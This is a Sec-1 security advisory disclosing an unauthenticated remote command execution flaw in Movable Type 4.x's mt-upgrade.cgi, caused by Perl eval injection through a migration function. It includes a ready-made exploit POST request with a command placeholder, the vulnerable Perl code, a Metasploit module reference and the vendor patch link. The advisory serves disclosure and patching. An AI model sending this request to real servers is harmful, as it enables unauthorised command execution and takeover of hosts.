Moveable Type 4.x Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Advisory Name : Moveable Type 4.x Unauthenticated Remote Command Execution via mt-upgrade.cgi
Discovery Date : 7/11/2012
Release Date : 22/1/2013
Application : Moveable Type 4.x
Platform : Any
Severity : HIGH. Unauthenticated Remote Command Execution
CVE : CVE-2013-0209 CVE-2012-6315
Discovered by : Nick Blundell
Vendor Status : Released patch for unmaintained 4.x branch
Website : http://www.sec-1.com/blog
Vulnerability Summary:
By directly calling an update-related CGI script with crafted input, and without requiring authentication, it is possible to execute arbitrary system commands on the host server.
MoveableType (MT) exposes a CGI script, mt-upgrade.cgi (usually at /cgi/mt/mt-upgrade.cgi), that is used during installation and updating of the platform.The vulnerability arises due to the following properties:

  1. This script may be invoked remotely without requiring authentication to any MT instance.
  2. Through a crafted POST request, it is possible to invoke particular database migration functions (i.e functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters.
  3. A particular migration function, core_drop_meta_for_table, allows a class parameter to be set which is used directly in a perl eval statement, allowing perl code injection.
Exploit Example:
With the following POST request we can gain unauthenticated code execution on the hosting server:

POST /cgi/mt/mt-upgrade.cgi HTTP/1.1
Host: [mt host name here]
Proxy-Connection: keep-alive
User-Agent: Mozilla/5...
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

__mode=run_actions&installing=1&steps=
[["core_drop_meta_for_table","class","`COMMAND_PAYLOAD_HERE`"]]
Vulnerable Code:
The vulnerable code lies in: lib/MT/Upgrade.pm

sub core_drop_meta_for_table {my $self = shift;
  my (%param) = @_;
  my $class = $param{class};
  my $sql = $param{sql};eval "require $class;";            <-----------------------------
  my $driver = $class->dbi_driver;
  my $dbh = $driver->rw_handle;
  my $err;
  eval {
    $dbh->do($sql) or $err = $dbh->errstr;
  };
  # ignore drop errors; the column has probably been
  # removed already
  #if ($err) {
  #    print STDERR "$err: $sql\n";
  #}return 0;
}
Exploit Code:
Metasploit exploit: movabletype_upgrade_exec.rb
Author(s): Kacper Nowak
Vendor Response:
Although the vendors no longer actively maintain the 4.x branch, they have published a patch to fix the issue: http://www.movabletype.org/2013/01/movable_type_438_patch.html
Copyright 2013 Sec-1 LTD. All rights reserved.
This entry was posted in Advisories. Bookmark the permalink.

Comments are closed.